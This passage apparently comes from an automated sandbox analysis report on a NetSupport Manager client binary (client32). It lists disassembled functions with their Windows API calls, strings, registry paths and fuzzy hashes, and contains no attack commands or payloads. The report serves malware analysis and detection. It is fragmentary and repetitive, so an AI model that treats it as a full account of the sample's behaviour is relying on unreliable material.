                                                                                                                                                                • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                                                                                                • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                                                                                                • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                                                                                                Function 11017220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(000002D8,000000FF), ref: 11017252
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                                                                                                • CoUninitialize.COMBASE ref: 110172E0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                                                                • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                                                                • API String ID: 2407233060-2037925671
                                                                                                                                                                • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                                                                                                • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                                                                                                • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                                                                                                • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                                                                                                Function 11096970 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                                                                                                • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                                                                • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                                                                • API String ID: 3222248624-258972079
                                                                                                                                                                • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                                                                                                • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                                                                                                • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                                                                                                • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                                                                                                Function 11025D00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                                                                                                • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                                                                                                • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                                                                • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                                                                • API String ID: 4186647306-532032230
                                                                                                                                                                • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                                                                                                • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                                                                                                • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                                                                                                • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
                                                                                                                                                                Function 1110F2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,776CC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                                                                                                • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                                                • API String ID: 3360349984-1136101629
                                                                                                                                                                • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                                                                                                • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                                                                                                • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                                                                                                • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                                                                                                Function 11031960 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                • String ID: %s%s%s.bin$562258$_HF$_HW$_SW
                                                                                                                                                                • API String ID: 2111968516-3988310630
                                                                                                                                                                • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                                                                                                • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                                                                                                • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                                                                                                • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                                                                                                Function 11102AB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                                                                                                • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                                                                                                • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                                                                                                • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                                                                • String ID: NSMDesktopWnd
                                                                                                                                                                • API String ID: 2669163067-206650970
                                                                                                                                                                • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                                                                                                • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                                                                                                • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                                                                                                • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                                                                                                Function 1113CC30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89timeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                                                                                                • KillTimer.USER32(00000000,00007F36,TermUI...), ref: 1113CCB3
                                                                                                                                                                • FreeLibrary.KERNEL32(76D50000,?,TermUI...), ref: 1113CD2B
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeKillLibraryTimer
                                                                                                                                                                • String ID: TermUI
                                                                                                                                                                • API String ID: 2006562601-4085834059
                                                                                                                                                                • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                                                                                                • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                                                                                                • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                                                                                                • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                                                                                                Function 11145330 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpen
                                                                                                                                                                • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                                                                • API String ID: 47109696-3245241687
                                                                                                                                                                • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                                                                                                • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                                                                                                • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                                                                                                • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                                                                                                Function 111114D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                                                                                                  • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                                                                                                  • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                                                                • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                                                                • API String ID: 806825551-1858614750
                                                                                                                                                                • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
